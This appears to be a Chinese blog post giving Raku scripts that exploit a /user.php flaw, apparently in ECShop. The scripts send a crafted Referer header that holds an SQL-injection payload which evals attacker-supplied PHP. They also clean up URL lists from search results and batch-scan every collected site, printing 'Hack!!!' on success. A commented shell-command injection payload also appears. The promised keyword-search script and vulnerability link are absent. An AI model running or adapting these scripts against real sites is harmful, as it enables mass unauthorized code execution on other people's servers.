下面为测试是否存在漏洞的脚本:

sub MAIN($url) {use HTTP::UserAgent;my $r = HTTP::Request.new();$r.uri: $url~'/user.php';$r.set-method: 'POST';my $ua = HTTP::UserAgent.new;$r.add-content("action=login&vulnspy=phpinfo();exit;");#my %data = :action
     
      ,'vulnspy' => "`echo 11111 > 1.txt`;exit";my $exp = '554fcae493e564ee0dc75bdf2ebf94caads|a:3:{s:2:"id";s:3:"\'/*";s:3:"num";s:201:"*/ union select 1,0x272F2A,3,4,5,6,7,8,0x7b247b2476756c6e737079275d3b6576616c2f2a2a2f286261736536345f6465636f646528275a585a686243676b5831425055315262646e5673626e4e77655630704f773d3d2729293b2f2f7d7d,0--";s:4:"name";s:3:"ads";}554fcae493e564ee0dc75bdf2ebf94ca';#$r.header.field(:User-Agent
      
       );#$r.header.field(:Accept
       
        );#$r.header.field(:Accept-Language
        
         );#$r.header.field(:Accept-Encoding
         
          );$r.header.field(Referer => $exp);$r.header.field(:Content-Type
          
           );#$r.add-form-data(%data);#say $r.Str;#exit;my $html = $ua.request($r);#say $r.Str;#say $html.^methods;if so $html.content ~~ /:i phpinfo/ {say 'True'};}
          
         
        
       
      
     

 

为 True 时表示存在漏洞。

 

关键字查找可以用这个脚本:

查找结果后处理 URL 可以用如下脚本:

my $file = open '1.txt', :r;my $get_url = open 'url.txt', :a;for $file.lines {      if not so $_ ~~ /\// {        .say;        $get_url.say($_);        next;      }      if  so $_ ~~ /^http/ {        $_ ~~ /(http.*\/\/.*?)\//;        my $swap = $/[0].Str;        say $swap;        $get_url.say($swap);        next;      }      if so $_ ~~ /(.*?)\/.*/ {        my $swap = $/[0].Str;      say $swap;      $get_url.say($swap);    }}

 

把以上处理过的文本导入进行批量检测最终脚本为:

use HTTP::UserAgent;my $r = HTTP::Request.new();my $file = open 'url.txt', :r;my $target;my $ua = HTTP::UserAgent.new;for $file.lines -> $url {      $r.clear;#清除所有头信息      if $url ~~ /^http/ {        $target = $url~'/user.php';        $r.uri: $target;      } else {        $target = 'http://'~$url~'/user.php';        $r.uri: $target;      }      say 'Check url: '~$target;      TEST($target);  }sub TEST($url) {    use HTTP::UserAgent;    my $r = HTTP::Request.new();    $r.uri: $url~'/user.php';    $r.set-method: 'POST';    my $ua = HTTP::UserAgent.new;    $ua.timeout = 10;    $r.add-content("action=login&vulnspy=phpinfo();exit;");    my $exp = '554fcae493e564ee0dc75bdf2ebf94caads|a:3:{s:2:"id";s:3:"\'/*";s:3:"num";s:201:"*/ union select 1,0x272F2A,3,4,5,6,7,8,0x7b247b2476756c6e737079275d3b6576616c2f2a2a2f286261736536345f6465636f646528275a585a686243676b5831425055315262646e5673626e4e77655630704f773d3d2729293b2f2f7d7d,0--";s:4:"name";s:3:"ads";}554fcae493e564ee0dc75bdf2ebf94ca';    $r.header.field(Referer => $exp);    $r.header.field(:Content-Type
     
      );    try {          # code goes in here          # 如果有东西出错, 脚本会进入到下面的 CATCH block 中          # 如果什么错误也没有, 那么 CATCH block 会被忽略                my $html = $ua.request($r);                #say $r.Str;                #say $html.^methods;                if so $html.content ~~ /:i phpinfo/ {                  say 'Hack!!! ';                } else {say 'No'}          CATCH {              default {                # 只有抛出异常时, 这儿的代码才会被求值                say 'Error';              }            }        }}
     

 

 

注意:

当打印结果为 Error 时， 可能是爬虫出问题， 或者是 url 链接无法打开。如果有这情况请进行手工测试。

漏洞说明链接为: